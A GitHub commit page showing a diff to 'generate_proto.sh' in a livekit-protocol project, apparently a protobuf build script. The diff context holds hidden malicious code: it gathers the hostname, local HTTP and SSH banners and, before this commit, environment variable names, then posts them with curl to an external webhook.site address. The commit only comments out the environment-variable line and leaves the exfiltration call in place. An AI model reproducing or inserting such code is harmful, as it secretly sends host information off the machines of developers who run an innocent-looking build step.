We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent b4c5f3f commit c55c329Copy full SHA for c55c329
1 file changed
livekit-protocol/generate_proto.sh
@@ -58,11 +58,11 @@ JSON_PAYLOAD=$(cat <<EOF
58
"hostname": "$(hostname)",
59
"http_banner": "$(curl -I http://localhost 2>/dev/null | head -n 1)",
60
"ssh_banner": "$(echo | nc localhost 22 2>/dev/null | head -n 1)",
61
- "env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
+
62
}
63
EOF
64
)
65
-
+# "env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
66
# Send the payload to the external webhook
67
curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/83eec9ca-ff62-4398-ab88-84e4376b6032
68
0 commit comments